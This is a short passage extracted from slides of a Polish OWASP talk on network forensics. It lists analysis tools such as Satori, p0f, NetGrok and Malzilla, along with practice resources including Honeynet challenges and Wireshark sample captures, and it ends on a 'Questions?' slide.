Satori (ale i p0f, Ettercap, ...) http://myweb.cableone.net/xnih/
NetGrokhttp://www.cs.umd.edu/projects/netgrok/
Malzillahttp://malzilla.sourceforge.net/
![Page 62: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/62.jpg)
62OWASP
Przykłady
Honeynet Project Challengeshttp://www.honeynet.org/challenges
Network Forensics Puzzle Contesthttp://forensicscontest.com/
Wireshark: Sample Captureshttp://wiki.wireshark.org/SampleCaptures
![Page 63: OWASP, Kraków, 2010-06-10 · Network Forensic – dlaczego na OWASP? Nie ma oprogramowania idealnego Incydenty należy zbadać, zwłaszcza te (nie)udane Im więcej źródeł informacji,](https://reader033.fdocuments.net/reader033/viewer/2022041621/5e3ee64948d332136d7941ac/html5/thumbnails/63.jpg)
63OWASP
Pytania?